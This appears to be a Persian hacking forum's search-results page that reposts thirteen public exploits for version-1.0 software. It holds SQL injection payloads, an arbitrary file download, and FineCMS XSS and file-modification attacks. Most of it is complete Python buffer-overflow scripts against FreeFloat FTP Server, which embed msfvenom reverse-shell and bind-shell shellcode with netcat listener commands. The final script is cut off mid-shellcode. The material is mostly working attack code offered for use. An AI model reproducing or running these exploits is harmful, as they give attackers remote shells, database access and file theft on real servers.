رفتن به مطلب

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های '1.0'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • AnonySec
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پروژه های شرکت
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

14 نتیجه پیدا شد

  1. Hacking

    <!-- # # # # # # Exploit Title: Bus Booking Script 1.0 - SQL Injection # Dork: N/A # Date: 13.12.2017 # Vendor Homepage: http://www.phpautoclassifiedscript.com/ # Software Link: http://www.phpautoclassifiedscript.com/bus-booking-script.html # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2017-17645 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: --> <html> <body> <form action="http://localhost/newbusbooking/admin/index.php" method="post" enctype="application/x-www-form-urlencoded" name="frmlogin" target="_self"> <input name="txtname" type="text" value="' UNION ALL SELECT 0x31,0x564552204159415249,0x33,0x34,0x35-- Ver Ayari"></div> <input name="logbut" id="logbut" type="submit"></div> </form> </body> </html>
  2. # # # # # # Exploit Title: Joomla! Component Bargain Product VM3 1.0 - SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor Homepage: https://www.weborange.eu/ # Software Link: https://www.weborange.eu/extensions/index.php/extensions-vm3/bargain-product-vm3-detail # Demo: http://www.weborange.eu/demo/index.php/bargain-product # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=brainy&product_id=[SQL] # http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=alice&product_id=[SQL] # # 17+OR+0x3231323232+/*!00005Group*/+BY+/*!00005ConcAT_WS*/(0x3a,0x496873616e2053656e63616e,VersioN(),FLooR(RaND(0)*0x32))+/*!00005havinG*/+min(0)+OR+0x31 # # Etc.. # # # # #
  3. Hacking

    # # # # # # Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022 # Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The security obligation allows an attacker to arbitrary download files.. # # Vulnerable Source: # # ............. # <?php # $file = base64_decode($_GET['id']); # # if (file_exists($file)) { # header('Content-Description: File Transfer'); # header('Content-Type: application/octet-stream'); # header('Content-Disposition: attachment; filename="'.basename($file).'"'); # header('Expires: 0'); # header('Cache-Control: must-revalidate'); # header('Pragma: public'); # header('Content-Length: ' . filesize($file)); # readfile($file); # exit; # } # ?> # ............. # Proof of Concept: # # http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64] # # Etc... # # # # #
  4. Hacking

    # # # # # # Exploit Title: FineCMS 1.0 Multiple Vulnerabilities # Dork: N/A # Date: 29.08.2017 # Vendor Homepage : http://mvc.net.pl/ # Software Link: https://github.com/andrzuk/FineCMS # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: sohaip-hackerDZ # Author Web: http://www.hacker-ar.com # Author Social: @sohaip_hackerDZ # # # # # Reflected XSS in get_image.php Technical Description: file /application/lib/ajax/get_image.php the $_POST['id'] and $_POST['name'] and $_GET['folder'] without any validated, sanitised or output encoded. Proof of Concept(PoC) http://your_finecms/application/lib/ajax/get_image.php?folder=1 POST: id=1"><script>alert(1)</script>&name=1 Arbitrary File Modify Technical Description: The base function for modify the template can modify the filename,this leads to the Arbitrary File Modify, who could allow attacker getshell. file /appalication/core/controller/template.php line50-line53 follow function save() file /appalication/core/model/template.php line26-line48 if file exists, we can modify it whihout any limit. insterestingly, there are two more Vulnerability for same function in different files. file /appalication/core/model/style.php line26-line48 file /appalication/core/model/script.php line26-line48 Proof of Concept(PoC) http://your_finecms/index.php?route=template http://your_finecms/index.php?route=style http://your_finecms/index.php?route=script POST: contents=<?php phpinfo();?>&filename={any exist filename}&savabutton=Zapisz Authenticated SQL injection all FineCMS use PDO to connect the mysql server, so all the data without any validated, sanitised or output encoded injection database.but in application/core/controller/excludes.php, the website author use mysqli to connect mysql server.the lead SQL injection, who could allow attacker use some payload to get data in database. Technical Description: file application/core/controller/excludes.php line75, the visitor_ip insert into database without any validated, sanitised or output encoded. file /stat/get_stat_data.php line30 the sql inject into sql_query and execute. Proof of Concept(PoC) http://your_finecms/index.php?route=excludes&action=add POST: visitor_ip=1%27%2Csleep%281%29%2C%271&save_button=Zapisz and view http://your_finecms/stat/get_stat_data.php,we can feel website loading sleep. Stored XSS in images.php FineCMS allow admin to upload image into gallery, and it will show image data into pages, but some data will output into pages without any validated, sanitised or output encoded. they allow attacker Cross Site Scripting. Technical Description: when we upload the file file application/core/controller/images.php line87 and follow the function add() file application/core/model/images.php line78 if filetype startwith "image",the filetype will insert into database when we view the detail of the images file application/lib/generators/view.php line106, somethings will output into pages. Proof of Concept(PoC) view the http://your_finecms/index.php?route=images&action=add and upload picture modify the picture's filetype view the detail of picture Because of the vulnerability also in edit detail page. so you also can use edit to insert Script code in pages. http://your_finecms/index.php?route=images&action=edit&id=15 view the detail of picture Stored XSS in visitors.php FineCMS stores all the visitors the visit url, but in detail of log they output into pages without any validated, sanitised or output encoded. they allow attacker Cross Site Scripting. Technical Description: just like last vulnerability. Proof of Concept(PoC) visit any page with js script code. such as index.php?route=images&action=view&id=14'"><script>alert(1)</script>
  5. Hacking

    # # # # # # Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022 # Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The security obligation allows an attacker to arbitrary download files.. # # Vulnerable Source: # # ............. # <?php # $file = base64_decode($_GET['id']); # # if (file_exists($file)) { # header('Content-Description: File Transfer'); # header('Content-Type: application/octet-stream'); # header('Content-Disposition: attachment; filename="'.basename($file).'"'); # header('Expires: 0'); # header('Cache-Control: must-revalidate'); # header('Pragma: public'); # header('Content-Length: ' . filesize($file)); # readfile($file); # exit; # } # ?> # ............. # Proof of Concept: # # http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64] # # Etc... # # # # #
  6. Hacking

    # # # # # # Exploit Title: iGreeting Cards 1.0 - SQL Injection # Dork: N/A # Date: 04.09.2017 # Vendor Homepage: http://coryapp.com/ # Software Link: http://coryapp.com/?product&index # Demo: http://coryapp.com/demo/greetingcards/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/index.php?index&search&k=[SQL] # # eFe'+/*!11112UnIoN*/(/*!11112SelEcT*/+0x283129,VERSioN(),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829)--+- # # http://localhost/[PATH]/index.php?index&index&p=[SQL] # # http://localhost/[PATH]/index.php?category&index&id=[SQL] # # Etc.. # # # # #
  7. Hacking

    # # # # # # Exploit Title: The Car Project 1.0 - SQL Injection # Dork: N/A # Date: 05.09.2017 # Vendor Homepage: http://thecarproject.org/ # Software Link: http://thecarproject.org/thecarproject.zip # Demo: http://www.thecarproject.org/cp # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Vulnerable Source: # # <?php # ............. # if(isset($_GET['car_id'])) { # $motor_id = $_GET['car_id']; # if (!empty($_GET['man_id'])){ # $manufacturer_id = $_GET['man_id']; # } # ............. # ?> # # Proof of Concept: # # http://localhost/[PATH]/info.php?car_id=[SQL] # # -5+/*!11122uNiOn*/(/*!11122sELect*/0x283129,0x283229,/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,(44),0x28343529,0x28343629,0x28343729,0x28343829,0x28343929) # # Etc.. # # # # #
  8. Hacking

    #!/usr/bin/env python # -*- coding: utf-8 -*- # Exploit Title: FreeFloat FTP Server RENAME Command Buffer Overflow Exploit # Date: 29/10/2016 # Exploit Author: Eagleblack # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip # Version: 1.00 # Tested on: Windows XP Profesional SP3 Spanish version x86 # CVE : N/A #Description: FreeFloat FTP server allow login as root without a user and password, this vulnerability allow to an attacker login and send a # long chain of characters that overflow the buffer, when the attacker knows the exact number that overwritten the EIP registry # he can take possession of the application and send a malicious code (payload) to the ESP stack pointer that allow obtain # a remote code execution on the system that is running the FTP Server, in this case Windows XP. import socket ret = "\x5B\x96\xDC\x77" #ADVAPI32.dll this dll have a jump to ESP stack pointer #Metasploit shellcode: #msfvenom -p windows/shell_reverse_tcp LHOST='IP address Local host' LPORT='' -b '\x00\x0a\x0d' -f c shellcode = ("\xd9\xe5\xba\x7e\xd1\x2c\x95\xd9\x74\x24\xf4\x58\x33\xc9\xb1" "\x52\x31\x50\x17\x83\xe8\xfc\x03\x2e\xc2\xce\x60\x32\x0c\x8c" "\x8b\xca\xcd\xf1\x02\x2f\xfc\x31\x70\x24\xaf\x81\xf2\x68\x5c" "\x69\x56\x98\xd7\x1f\x7f\xaf\x50\x95\x59\x9e\x61\x86\x9a\x81" "\xe1\xd5\xce\x61\xdb\x15\x03\x60\x1c\x4b\xee\x30\xf5\x07\x5d" "\xa4\x72\x5d\x5e\x4f\xc8\x73\xe6\xac\x99\x72\xc7\x63\x91\x2c" "\xc7\x82\x76\x45\x4e\x9c\x9b\x60\x18\x17\x6f\x1e\x9b\xf1\xa1" "\xdf\x30\x3c\x0e\x12\x48\x79\xa9\xcd\x3f\x73\xc9\x70\x38\x40" "\xb3\xae\xcd\x52\x13\x24\x75\xbe\xa5\xe9\xe0\x35\xa9\x46\x66" "\x11\xae\x59\xab\x2a\xca\xd2\x4a\xfc\x5a\xa0\x68\xd8\x07\x72" "\x10\x79\xe2\xd5\x2d\x99\x4d\x89\x8b\xd2\x60\xde\xa1\xb9\xec" "\x13\x88\x41\xed\x3b\x9b\x32\xdf\xe4\x37\xdc\x53\x6c\x9e\x1b" "\x93\x47\x66\xb3\x6a\x68\x97\x9a\xa8\x3c\xc7\xb4\x19\x3d\x8c" "\x44\xa5\xe8\x03\x14\x09\x43\xe4\xc4\xe9\x33\x8c\x0e\xe6\x6c" "\xac\x31\x2c\x05\x47\xc8\xa7\xea\x30\xd3\x30\x83\x42\xd3\x3f" "\xe8\xca\x35\x55\x1e\x9b\xee\xc2\x87\x86\x64\x72\x47\x1d\x01" "\xb4\xc3\x92\xf6\x7b\x24\xde\xe4\xec\xc4\x95\x56\xba\xdb\x03" "\xfe\x20\x49\xc8\xfe\x2f\x72\x47\xa9\x78\x44\x9e\x3f\x95\xff" "\x08\x5d\x64\x99\x73\xe5\xb3\x5a\x7d\xe4\x36\xe6\x59\xf6\x8e" "\xe7\xe5\xa2\x5e\xbe\xb3\x1c\x19\x68\x72\xf6\xf3\xc7\xdc\x9e" "\x82\x2b\xdf\xd8\x8a\x61\xa9\x04\x3a\xdc\xec\x3b\xf3\x88\xf8" "\x44\xe9\x28\x06\x9f\xa9\x59\x4d\xbd\x98\xf1\x08\x54\x99\x9f" "\xaa\x83\xde\x99\x28\x21\x9f\x5d\x30\x40\x9a\x1a\xf6\xb9\xd6" "\x33\x93\xbd\x45\x33\xb6") buffer = '\x41'* 245 + ret + '\x90'* 30 + shellcode #EIP overwritten at offset 245 print "Sending Buffer" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #open socket connect = s.connect(('192.168.1.13',21)) #IP address and port (21) from the target s.recv(1024) #FTPBanner s.send('USER \r\n') #Sending USER (Null user) s.recv(1024) s.send('PASS \r\n') #Sending Password (Null password) s.recv(1024) s.send('RENAME' + buffer +'\r\n') s.close()
  9. Hacking

    #!/usr/bin/env python #-*- coding: utf-8 -*- # Exploit Title: FreeFloat FTP Server HOST Command Buffer Overflow Exploit # Date: 30/10/2016 # Exploit Author: Cybernetic # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip # Version: 1.00 # Tested on: Windows XP Profesional SP3 ESP x86 # CVE : N/A import socket, os, sys ret="\xC7\x31\x6B\x7E" #Shell32.dll 7E6B31C7 #Metasploit Shellcode #msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -b '\x00\x0a\x0d' -f c #nc -lvp 443 #Send exploit shellcode=("\xbb\x89\x62\x48\xda\xdb\xda\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" "\x52\x31\x5a\x12\x03\x5a\x12\x83\x4b\x66\xaa\x2f\xb7\x8f\xa8" "\xd0\x47\x50\xcd\x59\xa2\x61\xcd\x3e\xa7\xd2\xfd\x35\xe5\xde" "\x76\x1b\x1d\x54\xfa\xb4\x12\xdd\xb1\xe2\x1d\xde\xea\xd7\x3c" "\x5c\xf1\x0b\x9e\x5d\x3a\x5e\xdf\x9a\x27\x93\x8d\x73\x23\x06" "\x21\xf7\x79\x9b\xca\x4b\x6f\x9b\x2f\x1b\x8e\x8a\xfe\x17\xc9" "\x0c\x01\xfb\x61\x05\x19\x18\x4f\xdf\x92\xea\x3b\xde\x72\x23" "\xc3\x4d\xbb\x8b\x36\x8f\xfc\x2c\xa9\xfa\xf4\x4e\x54\xfd\xc3" "\x2d\x82\x88\xd7\x96\x41\x2a\x33\x26\x85\xad\xb0\x24\x62\xb9" "\x9e\x28\x75\x6e\x95\x55\xfe\x91\x79\xdc\x44\xb6\x5d\x84\x1f" "\xd7\xc4\x60\xf1\xe8\x16\xcb\xae\x4c\x5d\xe6\xbb\xfc\x3c\x6f" "\x0f\xcd\xbe\x6f\x07\x46\xcd\x5d\x88\xfc\x59\xee\x41\xdb\x9e" "\x11\x78\x9b\x30\xec\x83\xdc\x19\x2b\xd7\x8c\x31\x9a\x58\x47" "\xc1\x23\x8d\xc8\x91\x8b\x7e\xa9\x41\x6c\x2f\x41\x8b\x63\x10" "\x71\xb4\xa9\x39\x18\x4f\x3a\x86\x75\x4e\xde\x6e\x84\x50\x1f" "\xd4\x01\xb6\x75\x3a\x44\x61\xe2\xa3\xcd\xf9\x93\x2c\xd8\x84" "\x94\xa7\xef\x79\x5a\x40\x85\x69\x0b\xa0\xd0\xd3\x9a\xbf\xce" "\x7b\x40\x2d\x95\x7b\x0f\x4e\x02\x2c\x58\xa0\x5b\xb8\x74\x9b" "\xf5\xde\x84\x7d\x3d\x5a\x53\xbe\xc0\x63\x16\xfa\xe6\x73\xee" "\x03\xa3\x27\xbe\x55\x7d\x91\x78\x0c\xcf\x4b\xd3\xe3\x99\x1b" "\xa2\xcf\x19\x5d\xab\x05\xec\x81\x1a\xf0\xa9\xbe\x93\x94\x3d" "\xc7\xc9\x04\xc1\x12\x4a\x34\x88\x3e\xfb\xdd\x55\xab\xb9\x83" "\x65\x06\xfd\xbd\xe5\xa2\x7e\x3a\xf5\xc7\x7b\x06\xb1\x34\xf6" "\x17\x54\x3a\xa5\x18\x7d") shell= '\x90'*30 + shellcode buffer='\x41'*247 + ret + shell + '\x43'*(696-len(shell)) print "Sending Buffer" s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('10.10.10.10',21)) s.recv(1024) s.send('USER test \r\n') s.recv(1024) s.send('PASS test \r\n') s.recv(1024) s.send('HOST' +buffer+ '\r\n') s.close() print "Attack Buffer Overflow Successfully Executed"
  10. Hacking

    #!/usr/bin/env python # -*- coding: utf-8 -*- import socket #Exploit Title: FreeFloat FTP Server Buffer Overflow RMD command #Date: 29 Octubre 2016 #Exploit Author: Karri93 #Software Link: http://www.freefloat.com/software/freefloatftpserver.zip #Version: 1.0 #Tested on: Windows XP Profesional SP3 Spanish x86 #Shellcode Metasploit: #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.7 LPORT=443 -b '\x00\x0A\x0D' -f -c #nc -lvp 443 ret= "\x2F\x1D\xF1\x77" #GDI32.dll shellcode=("\xd9\xc4\xd9\x74\x24\xf4\x5b\x33\xc9\xb1\x52\xba\x9b\x84\x71" "\xb0\x83\xc3\x04\x31\x53\x13\x03\xc8\x97\x93\x45\x12\x7f\xd1" "\xa6\xea\x80\xb6\x2f\x0f\xb1\xf6\x54\x44\xe2\xc6\x1f\x08\x0f" "\xac\x72\xb8\x84\xc0\x5a\xcf\x2d\x6e\xbd\xfe\xae\xc3\xfd\x61" "\x2d\x1e\xd2\x41\x0c\xd1\x27\x80\x49\x0c\xc5\xd0\x02\x5a\x78" "\xc4\x27\x16\x41\x6f\x7b\xb6\xc1\x8c\xcc\xb9\xe0\x03\x46\xe0" "\x22\xa2\x8b\x98\x6a\xbc\xc8\xa5\x25\x37\x3a\x51\xb4\x91\x72" "\x9a\x1b\xdc\xba\x69\x65\x19\x7c\x92\x10\x53\x7e\x2f\x23\xa0" "\xfc\xeb\xa6\x32\xa6\x78\x10\x9e\x56\xac\xc7\x55\x54\x19\x83" "\x31\x79\x9c\x40\x4a\x85\x15\x67\x9c\x0f\x6d\x4c\x38\x4b\x35" "\xed\x19\x31\x98\x12\x79\x9a\x45\xb7\xf2\x37\x91\xca\x59\x50" "\x56\xe7\x61\xa0\xf0\x70\x12\x92\x5f\x2b\xbc\x9e\x28\xf5\x3b" "\xe0\x02\x41\xd3\x1f\xad\xb2\xfa\xdb\xf9\xe2\x94\xca\x81\x68" "\x64\xf2\x57\x3e\x34\x5c\x08\xff\xe4\x1c\xf8\x97\xee\x92\x27" "\x87\x11\x79\x40\x22\xe8\xea\xaf\x1b\xf3\xed\x47\x5e\xf3\xf0" "\x2c\xd7\x15\x98\x42\xbe\x8e\x35\xfa\x9b\x44\xa7\x03\x36\x21" "\xe7\x88\xb5\xd6\xa6\x78\xb3\xc4\x5f\x89\x8e\xb6\xf6\x96\x24" "\xde\x95\x05\xa3\x1e\xd3\x35\x7c\x49\xb4\x88\x75\x1f\x28\xb2" "\x2f\x3d\xb1\x22\x17\x85\x6e\x97\x96\x04\xe2\xa3\xbc\x16\x3a" "\x2b\xf9\x42\x92\x7a\x57\x3c\x54\xd5\x19\x96\x0e\x8a\xf3\x7e" "\xd6\xe0\xc3\xf8\xd7\x2c\xb2\xe4\x66\x99\x83\x1b\x46\x4d\x04" "\x64\xba\xed\xeb\xbf\x7e\x1d\xa6\x9d\xd7\xb6\x6f\x74\x6a\xdb" "\x8f\xa3\xa9\xe2\x13\x41\x52\x11\x0b\x20\x57\x5d\x8b\xd9\x25" "\xce\x7e\xdd\x9a\xef\xaa") buffer= '\x90'*30 + shellcode buffer1= '\x41' * 248 + ret + buffer + '\x43'*(696-len(buffer)) print "Sending..." s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('192.168.1.150',21)) s.recv(1024) s.send('USER free\r\n') s.recv(1024) s.send('PASS free\r\n') s.recv(1024) s.send('RMD' + buffer1 + '\r\n') s.close()
  11. Hacking

    #!/usr/bin/env python #-*- coding: utf-8 -*- # Exploit Title: FreeFloat FTP Server BoF ABOR Command # Date: 29/10/2016 # Exploit Author: Ger # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip # Version: 1.0 # Tested on: Windows XP Profesional V. 2002 Service Pack 3 # CVE : n/a import socket #shellcode with metasploit #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.74.132 LPORT=443 -b '\x00\x0d\x0a' -f c #nc -lvp 443 #send the exploit ret='\x73\x18\x6E\x74' #MSCTF.dll shellcode=("\xdd\xc6\xd9\x74\x24\xf4\x5d\xb8\x2a\xb4\x5a\x74\x29\xc9\xb1" "\x52\x31\x45\x17\x03\x45\x17\x83\xef\xb0\xb8\x81\x13\x50\xbe" "\x6a\xeb\xa1\xdf\xe3\x0e\x90\xdf\x90\x5b\x83\xef\xd3\x09\x28" "\x9b\xb6\xb9\xbb\xe9\x1e\xce\x0c\x47\x79\xe1\x8d\xf4\xb9\x60" "\x0e\x07\xee\x42\x2f\xc8\xe3\x83\x68\x35\x09\xd1\x21\x31\xbc" "\xc5\x46\x0f\x7d\x6e\x14\x81\x05\x93\xed\xa0\x24\x02\x65\xfb" "\xe6\xa5\xaa\x77\xaf\xbd\xaf\xb2\x79\x36\x1b\x48\x78\x9e\x55" "\xb1\xd7\xdf\x59\x40\x29\x18\x5d\xbb\x5c\x50\x9d\x46\x67\xa7" "\xdf\x9c\xe2\x33\x47\x56\x54\x9f\x79\xbb\x03\x54\x75\x70\x47" "\x32\x9a\x87\x84\x49\xa6\x0c\x2b\x9d\x2e\x56\x08\x39\x6a\x0c" "\x31\x18\xd6\xe3\x4e\x7a\xb9\x5c\xeb\xf1\x54\x88\x86\x58\x31" "\x7d\xab\x62\xc1\xe9\xbc\x11\xf3\xb6\x16\xbd\xbf\x3f\xb1\x3a" "\xbf\x15\x05\xd4\x3e\x96\x76\xfd\x84\xc2\x26\x95\x2d\x6b\xad" "\x65\xd1\xbe\x62\x35\x7d\x11\xc3\xe5\x3d\xc1\xab\xef\xb1\x3e" "\xcb\x10\x18\x57\x66\xeb\xcb\x98\xdf\xb9\x8f\x71\x22\x3d\x91" "\x3a\xab\xdb\xfb\x2c\xfa\x74\x94\xd5\xa7\x0e\x05\x19\x72\x6b" "\x05\x91\x71\x8c\xc8\x52\xff\x9e\xbd\x92\x4a\xfc\x68\xac\x60" "\x68\xf6\x3f\xef\x68\x71\x5c\xb8\x3f\xd6\x92\xb1\xd5\xca\x8d" "\x6b\xcb\x16\x4b\x53\x4f\xcd\xa8\x5a\x4e\x80\x95\x78\x40\x5c" "\x15\xc5\x34\x30\x40\x93\xe2\xf6\x3a\x55\x5c\xa1\x91\x3f\x08" "\x34\xda\xff\x4e\x39\x37\x76\xae\x88\xee\xcf\xd1\x25\x67\xd8" "\xaa\x5b\x17\x27\x61\xd8\x27\x62\x2b\x49\xa0\x2b\xbe\xcb\xad" "\xcb\x15\x0f\xc8\x4f\x9f\xf0\x2f\x4f\xea\xf5\x74\xd7\x07\x84" "\xe5\xb2\x27\x3b\x05\x97") buffer='\x90'*20 + shellcode buffer1='\x41'*247 + ret + buffer + '\x43'*(696-len(buffer)) print "Sending Buffer" s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('192.168.74.133', 21)) s.recv(1024) s.send('USER anonymous\r\n') s.recv(1024) s.send('PASS anonymous\r\n') s.recv(1024) s.send('ABOR' + buffer1 + '\r\n') s.close()
  12. Hacking

    import socket import sys import os print ''' ############################################## # Created: ScrR1pTK1dd13 # # Name: Greg Priest # # Mail: [email protected] # ############################################## # Exploit Title: FreefloatFTPserver1.0_dir_command_remotecode_exploit # Date: 2016.11.02 # Exploit Author: Greg Priest # Version: FreefloatFTPserver1.0 # Tested on: Windows7 x64 HUN/ENG Professional ''' ip = raw_input("Target ip: ") port = 21 overflow = 'A' * 247 eip = '\xF4\xAF\xEA\x75' + '\x90' * 10 #shellcode calc.exe shellcode =( "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" + "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" + "\x77\x20\x8b\x3f\x80\x7e\x0c\x33" + "\x75\xf2\x89\xc7\x03\x78\x3c\x8b" + "\x57\x78\x01\xc2\x8b\x7a\x20\x01" + "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" + "\x45\x81\x3e\x43\x72\x65\x61\x75" + "\xf2\x81\x7e\x08\x6f\x63\x65\x73" + "\x75\xe9\x8b\x7a\x24\x01\xc7\x66" + "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" + "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" + "\xb1\xff\x53\xe2\xfd\x68\x63\x61" + "\x6c\x63\x89\xe2\x52\x52\x53\x53" + "\x53\x53\x53\x53\x52\x53\xff\xd7") remotecode = overflow + eip + shellcode + '\r\n' s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect((ip ,port)) s.recv(1024) s.send('USER anonymous\r\n') s.recv(1024) s.send('PASSW [email protected]\r\n') s.recv(1024) print ''' Successfull Exploitation! ''' message = 'dir ' + remotecode s.send(message) s.recv(1024) s.close
  13. #!/usr/bin/env python #-*- coding: utf-8 -*- # Exploit Title: FreeFloat FTP Server BoF SITE ZONE Command # Date: 04/11/2016 # Exploit Author: Luis Noriega # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip # Version: 1.0 # Tested on: Windows XP Profesional V. 5.1 Service Pack 3 # CVE : n/a import socket # shellcode with metasploit: # msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c # nc 192.168.1.150 4444 ret = "\x2F\x1D\xF1\x77" # GDI32.dll shellcode = ("\xb8\x78\xa3\x16\x0c\xdd\xc2\xd9\x74\x24\xf4\x5b\x31\xc9\xb1" "\x53\x31\x43\x12\x83\xeb\xfc\x03\x3b\xad\xf4\xf9\x47\x59\x7a" "\x01\xb7\x9a\x1b\x8b\x52\xab\x1b\xef\x17\x9c\xab\x7b\x75\x11" "\x47\x29\x6d\xa2\x25\xe6\x82\x03\x83\xd0\xad\x94\xb8\x21\xac" "\x16\xc3\x75\x0e\x26\x0c\x88\x4f\x6f\x71\x61\x1d\x38\xfd\xd4" "\xb1\x4d\x4b\xe5\x3a\x1d\x5d\x6d\xdf\xd6\x5c\x5c\x4e\x6c\x07" "\x7e\x71\xa1\x33\x37\x69\xa6\x7e\x81\x02\x1c\xf4\x10\xc2\x6c" "\xf5\xbf\x2b\x41\x04\xc1\x6c\x66\xf7\xb4\x84\x94\x8a\xce\x53" "\xe6\x50\x5a\x47\x40\x12\xfc\xa3\x70\xf7\x9b\x20\x7e\xbc\xe8" "\x6e\x63\x43\x3c\x05\x9f\xc8\xc3\xc9\x29\x8a\xe7\xcd\x72\x48" "\x89\x54\xdf\x3f\xb6\x86\x80\xe0\x12\xcd\x2d\xf4\x2e\x8c\x39" "\x39\x03\x2e\xba\x55\x14\x5d\x88\xfa\x8e\xc9\xa0\x73\x09\x0e" "\xc6\xa9\xed\x80\x39\x52\x0e\x89\xfd\x06\x5e\xa1\xd4\x26\x35" "\x31\xd8\xf2\xa0\x39\x7f\xad\xd6\xc4\x3f\x1d\x57\x66\xa8\x77" "\x58\x59\xc8\x77\xb2\xf2\x61\x8a\x3d\xed\x2d\x03\xdb\x67\xde" "\x45\x73\x1f\x1c\xb2\x4c\xb8\x5f\x90\xe4\x2e\x17\xf2\x33\x51" "\xa8\xd0\x13\xc5\x23\x37\xa0\xf4\x33\x12\x80\x61\xa3\xe8\x41" "\xc0\x55\xec\x4b\xb2\xf6\x7f\x10\x42\x70\x9c\x8f\x15\xd5\x52" "\xc6\xf3\xcb\xcd\x70\xe1\x11\x8b\xbb\xa1\xcd\x68\x45\x28\x83" 